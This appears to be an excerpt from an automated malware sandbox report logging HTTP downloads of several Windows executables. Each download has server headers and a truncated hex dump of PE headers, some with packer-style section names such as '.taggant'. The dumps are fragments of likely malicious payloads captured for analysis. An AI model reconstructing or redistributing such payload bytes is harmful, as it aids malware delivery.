05 00 00 00 60 01 00 00 06 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 01 00 00 02 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 14 05 00 00 a0 01 00 00 14 05 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 14 05 00 00 c0 06 00 00 14 05 00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:48 GMTContent-Type: application/octet-streamContent-Length: 332800Last-Modified: Fri, 07 Feb 2025 04:36:30 GMTConnection: keep-aliveETag: "67a58dce-51400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 aa 00 00 00 00 00 00 40 b9 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d9 9b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 9d 04 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 64 04 00 00 10 00 00 00 66 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 73 20 00 00 00 80 04 00 00 22 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 cf 00 00 00 b0 04 00 00 4e 00 00 00 8c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 10 39 00 00 00 80 05 00 00 3a 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:47 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:50 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:52 GMTContent-Type: application/octet-streamContent-Length: 2150912Last-Modified: Tue, 11 Feb 2025 16:41:29 GMTConnection: keep-aliveETag: "67ab7db9-20d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 97 bb 8b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 4b 00 00 04 00 00 8c 28 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6f 61 73 6a 63 61 79 00 50 1a 00 00 e0 30 00 00 4a 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 67 74 6b 70 74 77 6b 00 10 00 00 00 30 4b 00 00 04 00 00 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 b0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:02 GMTContent-Type: application/octet-streamContent-Length: 3218752Last-Modified: Tue, 11 Feb 2025 05:41:47 GMTConnection: keep-aliveETag: "67aae31b-311d40"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 31 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 d8 30 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 dc 2f 00 00 60 01 00 00 dc 2f 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:09 GMTContent-Type: application/octet-streamContent-Length: 2074624Last-Modified: Sun, 09 Feb 2025 11:32:34 GMTConnection: keep-aliveETag: "67a89252-1fa800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 da d7 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 75 66 6d 62 74 6c 78 00 00 1a 00 00 60 30 00 00 fa 19 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 72 68 6e 64 63 6c 66 00 10 00 00 00 60 4a 00 00 06 00 00 00 80 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 86 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:20 GMTContent-Type: application/octet-streamContent-Length: 2168320Last-Modified: Sat, 08 Feb 2025 13:31:29 GMTConnection: keep-aliveETag: "67a75cb1-211600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 21 06 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 70 75 68 68 64 76 67 00 90 1a 00 00 20 31 00 00 8c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 72 74 6a 65 76 65 00 10 00 00 00 b0 4b 00 00 06 00 00 00 ee 20 00 00 00 00 00 00 00 00 00 00 00 